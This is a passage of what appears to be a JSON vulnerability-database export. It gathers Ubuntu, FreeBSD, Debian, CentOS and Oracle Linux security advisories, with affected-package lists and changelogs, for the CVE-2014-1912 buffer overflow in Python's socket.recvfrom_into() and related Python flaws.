"12.10", "packageVersion": "2.7.3-5ubuntu4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python2.7-minimal", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "13.10", "packageVersion": "3.3.2-7ubuntu3.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python3.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.3-0ubuntu3.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python3.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.3-0ubuntu3.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python3.2-minimal", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "2.6.5-1ubuntu6.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python2.6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.10", "packageVersion": "3.2.3-6ubuntu3.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python3.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.10", "packageVersion": "2.7.3-5ubuntu4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python2.7", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "2.7.3-0ubuntu3.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python2.7-minimal", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.10", "packageVersion": "3.3.0-1ubuntu0.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python3.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "13.10", "packageVersion": "3.3.2-7ubuntu3.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python3.3-minimal", "operator": "lt"}], "description": "Ryan Smith-Roberts discovered that Python incorrectly handled buffer sizes when using the socket.recvfrom_into() function. An attacker could possibly use this issue to cause Python to crash, resulting in denial of service, or possibly execute arbitrary code.", "edition": 3, "reporter": "Ubuntu", "published": "2014-03-03T00:00:00", "title": "Python vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912"], "modified": "2014-03-03T00:00:00", "id": "USN-2125-1", "href": "https://usn.ubuntu.com/2125-1/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:51", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "https://mail.python.org/pipermail/python-dev/2014-February/132758.html", "http://bugs.python.org/issue20246"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.3.3_2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python33", "operator": "le"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.7.6_3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python27", "operator": "le"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.1.5_10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python31", "operator": "le"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "3.2.5_7", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python32", "operator": "le"}], "description": "\nVincent Danen via Red Hat Issue Tracker reports:\n\nA vulnerability was reported in Python's socket module, due to a\n\t boundary error within the sock_recvfrom_into() function, which could be\n\t exploited to cause a buffer overflow. This could be used to crash a\n\t Python application that uses the socket.recvfrom_info() function or,\n\t possibly, execute arbitrary code with the permissions of the user\n\t running vulnerable Python code.\nThis vulnerable function, socket.recvfrom_into(), was introduced in\n\t Python 2.5. Earlier versions are not affected by this flaw.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-01-14T00:00:00", "title": "Python -- buffer overflow in socket.recvfrom_into()", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912"], "modified": "2014-01-14T00:00:00", "id": "8E5E6D42-A0FA-11E3-B09A-080027F2D077", "href": "https://vuxml.freebsd.org/freebsd/8e5e6d42-a0fa-11e3-b09a-080027f2d077.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-18T13:50:11", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "2.7.3-6+deb7u2", "arch": "all", "packageFilename": "python2.7_2.7.3-6+deb7u2_all.deb", "packageName": "python2.7", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2880-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMarch 17, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : python2.7\nCVE ID : CVE-2013-4238 CVE-2014-1912\n\nMultiple security issues were discovered in Python:\n\nCVE-2013-4238\n\n Ryan Sleevi that NULL charactors in the subject alternate names of\n SSL cerficates were parsed incorrectly.\n\nCVE-2014-1912\n\n Ryan Smith-Roberts discovered a buffer overflow in the \n socket.recvfrom_into() function.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 2.7.3-6+deb7u2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.7.6-7.\n\nWe recommend that you upgrade your python2.7 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2014-03-17T18:08:04", "title": "[SECURITY] [DSA 2880-1] python2.7 security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:50:11", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912", "CVE-2013-4238"], "modified": "2014-03-17T18:08:04", "id": "DEBIAN:DSA-2880-1:28B7E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00051.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:13:05", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "packageVersion": "2.6.6-8+deb6u1", "arch": "all", "packageFilename": "python2.6-dev_2.6.6-8+deb6u1_all.deb", "packageName": "python2.6-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "2.6.6-8+deb6u1", "arch": "all", "packageFilename": "libpython2.6_2.6.6-8+deb6u1_all.deb", "packageName": "libpython2.6", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "2.6.6-8+deb6u1", "arch": "all", "packageFilename": "python2.6-dbg_2.6.6-8+deb6u1_all.deb", "packageName": "python2.6-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "2.6.6-8+deb6u1", "arch": "all", "packageFilename": "python2.6-minimal_2.6.6-8+deb6u1_all.deb", "packageName": "python2.6-minimal", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "2.6.6-8+deb6u1", "arch": "all", "packageFilename": "idle-python2.6_2.6.6-8+deb6u1_all.deb", "packageName": "idle-python2.6", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "2.6.6-8+deb6u1", "arch": "all", "packageFilename": "python2.6-doc_2.6.6-8+deb6u1_all.deb", "packageName": "python2.6-doc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "2.6.6-8+deb6u1", "arch": "all", "packageFilename": "python2.6-examples_2.6.6-8+deb6u1_all.deb", "packageName": "python2.6-examples", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "2.6.6-8+deb6u1", "arch": "all", "packageFilename": "python2.6_2.6.6-8+deb6u1_all.deb", "packageName": "python2.6", "operator": "lt"}], "description": "Package : python2.6\nVersion : 2.6.6-8+deb6u1\nCVE ID : CVE-2011-1015 CVE-2011-1521 CVE-2011-4940 CVE-2011-4944 \n CVE-2012-0845 CVE-2012-1150 CVE-2013-4238 CVE-2014-1912\n\nMultiple vulnerabilities were discovered in python2.6. The more\nrelevant are:\n\nCVE-2013-4238\n\n Incorrect handling of NUL bytes in certificate hostnames may allow\n server spoofing via specially-crafted certificates signed by\n a trusted Certification Authority.\n\nCVE-2014-1912\n\n Buffer overflow in socket.recvfrom_into leading to application\n crash and possibly code execution.\n", "edition": 1, "reporter": "Debian", "published": "2014-07-31T21:08:00", "title": "[DLA 25-1] python2.6 security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:05", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912", "CVE-2013-4238", "CVE-2011-1521", "CVE-2011-4944", "CVE-2012-1150", "CVE-2012-0845", "CVE-2011-4940", "CVE-2011-1015"], "modified": "2014-07-31T21:08:00", "id": "DEBIAN:DLA-25-1:0FCA7", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201407/msg00014.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-03T18:26:44", "references": ["https://rhn.redhat.com/errata/RHSA-2015-1330.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "i686", "packageName": "tkinter", "packageFilename": "tkinter-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "i686", "packageName": "python-devel", "packageFilename": "python-devel-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "i686", "packageName": "python-devel", "packageFilename": "python-devel-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "x86_64", "packageName": "python-tools", "packageFilename": "python-tools-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "x86_64", "packageName": "python-libs", "packageFilename": "python-libs-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "x86_64", "packageName": "tkinter", "packageFilename": "tkinter-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "i686", "packageName": "python-tools", "packageFilename": "python-tools-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "x86_64", "packageName": "python", "packageFilename": "python-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "x86_64", "packageName": "python-test", "packageFilename": "python-test-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "any", "packageName": "python", "packageFilename": "python-2.6.6-64.el6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "i686", "packageName": "python-libs", "packageFilename": "python-libs-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "i686", "packageName": "python-libs", "packageFilename": "python-libs-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "x86_64", "packageName": "python-devel", "packageFilename": "python-devel-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "i686", "packageName": "python", "packageFilename": "python-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.6-64.el6", "arch": "i686", "packageName": "python-test", "packageFilename": "python-test-2.6.6-64.el6.i686.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2015:1330\n\n\nPython is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes, users\nare directed to the following article on the Red Hat Customer Portal:\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2015-July/001906.html\n\n**Affected packages:**\npython\npython-devel\npython-libs\npython-test\npython-tools\ntkinter\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1330.html", "edition": 1, "reporter": "CentOS Project", "published": "2015-07-26T14:11:19", "title": "python, tkinter security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-07-26T14:11:19", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2015-July/001906.html", "id": "CESA-2015:1330", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:40:47", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "i686", "packageFilename": "python-devel-2.6.6-64.0.1.el6.i686.rpm", "packageName": "python-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "i686", "packageFilename": "python-devel-2.6.6-64.0.1.el6.i686.rpm", "packageName": "python-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "i686", "packageFilename": "tkinter-2.6.6-64.0.1.el6.i686.rpm", "packageName": "tkinter", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "i686", "packageFilename": "python-libs-2.6.6-64.0.1.el6.i686.rpm", "packageName": "python-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "i686", "packageFilename": "python-libs-2.6.6-64.0.1.el6.i686.rpm", "packageName": "python-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "x86_64", "packageFilename": "tkinter-2.6.6-64.0.1.el6.x86_64.rpm", "packageName": "tkinter", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "i686", "packageFilename": "python-tools-2.6.6-64.0.1.el6.i686.rpm", "packageName": "python-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "i686", "packageFilename": "python-test-2.6.6-64.0.1.el6.i686.rpm", "packageName": "python-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "src", "packageFilename": "python-2.6.6-64.0.1.el6.src.rpm", "packageName": "python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "src", "packageFilename": "python-2.6.6-64.0.1.el6.src.rpm", "packageName": "python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "x86_64", "packageFilename": "python-libs-2.6.6-64.0.1.el6.x86_64.rpm", "packageName": "python-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "x86_64", "packageFilename": "python-devel-2.6.6-64.0.1.el6.x86_64.rpm", "packageName": "python-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "x86_64", "packageFilename": "python-test-2.6.6-64.0.1.el6.x86_64.rpm", "packageName": "python-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "x86_64", "packageFilename": "python-2.6.6-64.0.1.el6.x86_64.rpm", "packageName": "python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "x86_64", "packageFilename": "python-tools-2.6.6-64.0.1.el6.x86_64.rpm", "packageName": "python-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.6-64.0.1.el6", "arch": "i686", "packageFilename": "python-2.6.6-64.0.1.el6.i686.rpm", "packageName": "python", "operator": "lt"}], "description": "[2.6.6-64.0.1]\n- Add Oracle Linux distribution in platform.py [orabug 21288328] (Keshav Sharma)\n[2.6.6-64]\n- Enable use of deepcopy() with instance methods\nResolves: rhbz#1223037\n[2.6.6-63]\n- Since -libs now provide python-ordered dict, added ordereddict\n dist-info to site-packages\nResolves: rhbz#1199997\n[2.6.6-62]\n- Fix CVE-2014-7185/4650/1912 CVE-2013-1752\nResolves: rhbz#1206572\n[2.6.6-61]\n- Fix logging module error when multiprocessing module is not initialized\nResolves: rhbz#1204966\n[2.6.6-60]\n- Add provides for python-ordereddict\nResolves: rhbz#1199997\n[2.6.6-59]\n- Let ConfigParse handle options without values\n- Add check phase to specfile, fix and skip relevant failing tests\nResolves: rhbz#1031709\n[2.6.6-58]\n- Make Popen.communicate catch EINTR error\nResolves: rhbz#1073165\n[2.6.6-57]\n- Add choices for sort option of cProfile for better output\nResolves: rhbz#1160640\n[2.6.6-56]\n- Make multiprocessing ignore EINTR\nResolves: rhbz#1180864\n[2.6.6-55]\n- Fix iteration over files with very long lines\nResolves: rhbz#794632\n[2.6.6-54]\n- Fix subprocess.Popen.communicate() being broken by SIGCHLD handler.\nResolves: rhbz#1065537\n- Rebuild against latest valgrind-devel.\nResolves: rhbz#1142170\n[2.6.6-53]\n- Bump release up to ensure proper upgrade path.\nRelated: rhbz#958256", "edition": 3, "reporter": "Oracle", "published": "2015-07-28T00:00:00", "title": "python security, bug fix, and enhancement update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-07-28T00:00:00", "id": "ELSA-2015-1330", "href": "http://linux.oracle.com/errata/ELSA-2015-1330.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:39:19", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.9.8-3.el6", "arch": "src", "packageFilename": "python27-python-setuptools-0.9.8-3.el6.src.rpm", "packageName": "python27-python-setuptools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.9.8-5.el7", "arch": "noarch", "packageFilename": "python27-python-setuptools-0.9.8-5.el7.noarch.rpm", "packageName": "python27-python-setuptools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.7.8-3.el7", "arch": "x86_64", "packageFilename": "python27-python-debug-2.7.8-3.el7.x86_64.rpm", "packageName": "python27-python-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.2.0-3.el7", "arch": "src", "packageFilename": "python27-python-simplejson-3.2.0-3.el7.src.rpm", "packageName": "python27-python-simplejson", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.24.0-2.el7", "arch": "noarch", "packageFilename": "python27-python-wheel-0.24.0-2.el7.noarch.rpm", "packageName": "python27-python-wheel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.1-20.el7", "arch": "x86_64", "packageFilename": "python27-runtime-1.1-20.el7.x86_64.rpm", "packageName": "python27-runtime", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.9.8-5.el7", "arch": "src", "packageFilename": "python27-python-setuptools-0.9.8-5.el7.src.rpm", "packageName": "python27-python-setuptools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.7.8-3.el7", "arch": "x86_64", "packageFilename": "python27-python-devel-2.7.8-3.el7.x86_64.rpm", "packageName": "python27-python-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.1-17.el6", "arch": "x86_64", "packageFilename": "python27-runtime-1.1-17.el6.x86_64.rpm", "packageName": "python27-runtime", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.7.8-3.el7", "arch": "x86_64", "packageFilename": "python27-python-test-2.7.8-3.el7.x86_64.rpm", "packageName": "python27-python-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.8-3.el6", "arch": "x86_64", "packageFilename": "python27-tkinter-2.7.8-3.el6.x86_64.rpm", "packageName": "python27-tkinter", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.6-5.el6", "arch": "noarch", "packageFilename": "python27-python-pip-1.5.6-5.el6.noarch.rpm", "packageName": "python27-python-pip", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.8-3.el6", "arch": "x86_64", "packageFilename": "python27-python-debug-2.7.8-3.el6.x86_64.rpm", "packageName": "python27-python-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.1-20.el7", "arch": "x86_64", "packageFilename": "python27-1.1-20.el7.x86_64.rpm", "packageName": "python27", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.7.8-3.el7", "arch": "x86_64", "packageFilename": "python27-python-2.7.8-3.el7.x86_64.rpm", "packageName": "python27-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.1-17.el6", "arch": "src", "packageFilename": "python27-1.1-17.el6.src.rpm", "packageName": "python27", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "0.24.0-2.el7", "arch": "src", "packageFilename": "python27-python-wheel-0.24.0-2.el7.src.rpm", "packageName": "python27-python-wheel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.8-3.el6", "arch": "x86_64", "packageFilename": "python27-python-libs-2.7.8-3.el6.x86_64.rpm", "packageName": "python27-python-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.8-3.el6", "arch": "x86_64", "packageFilename": "python27-python-2.7.8-3.el6.x86_64.rpm", "packageName": "python27-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.7.8-3.el7", "arch": "x86_64", "packageFilename": "python27-python-libs-2.7.8-3.el7.x86_64.rpm", "packageName": "python27-python-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.5.6-5.el7", "arch": "noarch", "packageFilename": "python27-python-pip-1.5.6-5.el7.noarch.rpm", "packageName": "python27-python-pip", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.2.0-3.el7", "arch": "x86_64", "packageFilename": "python27-python-simplejson-3.2.0-3.el7.x86_64.rpm", "packageName": "python27-python-simplejson", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.2.0-2.el6", "arch": "x86_64", "packageFilename": "python27-python-simplejson-3.2.0-2.el6.x86_64.rpm", "packageName": "python27-python-simplejson", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.7.8-3.el7", "arch": "x86_64", "packageFilename": "python27-python-tools-2.7.8-3.el7.x86_64.rpm", "packageName": "python27-python-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.1-17.el6", "arch": "x86_64", "packageFilename": "python27-1.1-17.el6.x86_64.rpm", "packageName": "python27", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.7.8-3.el7", "arch": "x86_64", "packageFilename": "python27-tkinter-2.7.8-3.el7.x86_64.rpm", "packageName": "python27-tkinter", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.5.6-5.el6", "arch": "src", "packageFilename": "python27-python-pip-1.5.6-5.el6.src.rpm", "packageName": "python27-python-pip", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.8-3.el6", "arch": "x86_64", "packageFilename": "python27-python-tools-2.7.8-3.el6.x86_64.rpm", "packageName": "python27-python-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.24.0-2.el6", "arch": "src", "packageFilename": "python27-python-wheel-0.24.0-2.el6.src.rpm", "packageName": "python27-python-wheel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.1-20.el7", "arch": "src", "packageFilename": "python27-1.1-20.el7.src.rpm", "packageName": "python27", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "3.2.0-2.el6", "arch": "src", "packageFilename": "python27-python-simplejson-3.2.0-2.el6.src.rpm", "packageName": "python27-python-simplejson", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.8-3.el6", "arch": "x86_64", "packageFilename": "python27-python-devel-2.7.8-3.el6.x86_64.rpm", "packageName": "python27-python-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.24.0-2.el6", "arch": "noarch", "packageFilename": "python27-python-wheel-0.24.0-2.el6.noarch.rpm", "packageName": "python27-python-wheel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.1-17.el6", "arch": "x86_64", "packageFilename": "python27-scldevel-1.1-17.el6.x86_64.rpm", "packageName": "python27-scldevel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.8-3.el6", "arch": "x86_64", "packageFilename": "python27-python-test-2.7.8-3.el6.x86_64.rpm", "packageName": "python27-python-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.1-20.el7", "arch": "x86_64", "packageFilename": "python27-scldevel-1.1-20.el7.x86_64.rpm", "packageName": "python27-scldevel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.7.8-3.el7", "arch": "src", "packageFilename": "python27-python-2.7.8-3.el7.src.rpm", "packageName": "python27-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.7.8-3.el6", "arch": "src", "packageFilename": "python27-python-2.7.8-3.el6.src.rpm", "packageName": "python27-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.5.6-5.el7", "arch": "src", "packageFilename": "python27-python-pip-1.5.6-5.el7.src.rpm", "packageName": "python27-python-pip", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "0.9.8-3.el6", "arch": "noarch", "packageFilename": "python27-python-setuptools-0.9.8-3.el6.noarch.rpm", "packageName": "python27-python-setuptools", "operator": "lt"}], "description": "python27\n[1.1-17]\n- Require python-pip and python-wheel (note: in rh-python34\n this is not necessary, because 'python' depends on these).\npython27-python\n[2.7.8-3]\n- Add httplib fix for CVE-2013-1752\nResolves: rhbz#1187779\n[2.7.8-2]\n- Fix %check\nunset DISPLAY\n setion not failing properly on failed test\n- Fixed CVE-2013-1752, CVE-2013-1753\nResolves: rhbz#1187779\n[2.7.8-1]\n- Update to 2.7.8.\nResolves: rhbz#1167912\n- Make python-devel depend on scl-utils-build.\nResolves: rhbz#1170993\npython27-python-pip\n - New Package 